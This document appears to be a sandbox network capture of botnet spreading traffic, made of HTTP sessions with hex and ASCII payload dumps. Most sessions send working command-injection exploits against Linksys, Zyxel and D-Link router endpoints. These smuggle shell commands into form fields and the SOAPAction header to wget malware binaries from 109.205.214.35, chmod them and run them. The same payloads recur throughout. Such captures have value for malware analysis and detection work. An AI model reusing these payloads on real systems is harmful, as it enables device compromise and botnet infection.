                                                        Mar 21, 2024 05:22:56.843074083 CET1286INData Raw: 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 48 74 74 70 2f 4d 69 64 64 6c 65 77 61 72 65 2f 48 61 6e 64 6c 65 43 6f 72 73 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 65 22 3a 20 36 32 2c 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: /src/Illuminate/Http/Middleware/HandleCors.php", "line": 62, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, {
                                                        Mar 21, 2024 05:22:56.843089104 CET1286INData Raw: 20 20 20 20 20 20 20 20 22 63 6c 61 73 73 22 3a 20 22 49 6c 6c 75 6d 69 6e 61 74 65 5c 5c 50 69 70 65 6c 69 6e 65 5c 5c 50 69 70 65 6c 69 6e 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 2d 3e 22 0a 20 20 20 20 20 20
                                                        Data Ascii: "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 180,
                                                        Mar 21, 2024 05:22:56.843157053 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61
                                                        Data Ascii: "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php", "line": 175, "function": "then", "class": "Illuminate\\Pipeline\\Pipeline", "type
                                                        Mar 21, 2024 05:22:56.843189001 CET50INData Raw: 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: .com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.135333818.223.94.378080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.759766102 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:56.884882927 CET188INHTTP/1.1 200 b'OK'
                                                        Server: Werkzeug/2.1.2 Python/3.8.10
                                                        Date: Thu, 21 Mar 2024 04:22:56 GMT
                                                        b'Content-Type': b'text/plain'
                                                        Transfer-Encoding: chunked
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.134646295.170.74.488080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.842634916 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.1356608181.136.230.2880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.009860039 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:57.197637081 CET108INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain
                                                        Content-Length: 35
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:57.197712898 CET47INData Raw: 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                        Data Ascii: Error 404: Not FoundFile not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.1354560213.0.95.6180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.010251999 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:58.060277939 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:59.283318996 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:01.804249048 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:06.668242931 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:16.396270037 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:36.876255035 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.136018086.159.121.1338081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.051882029 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.134877095.57.104.23480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.072046041 CET794INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20
                                                        Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.30 26Oct2018Date: Thu, 21 Mar 2024 04:22:56 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sContent-Security-Policy: frame-ancestors 'none'Content-Security-Policy: fr


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.135973283.66.66.978080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.103674889 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.133455080.87.192.19780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.213985920 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:58.284234047 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:58.492090940 CET504INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:58 GMT
                                                        Connection: close
                                                        Content-Length: 315
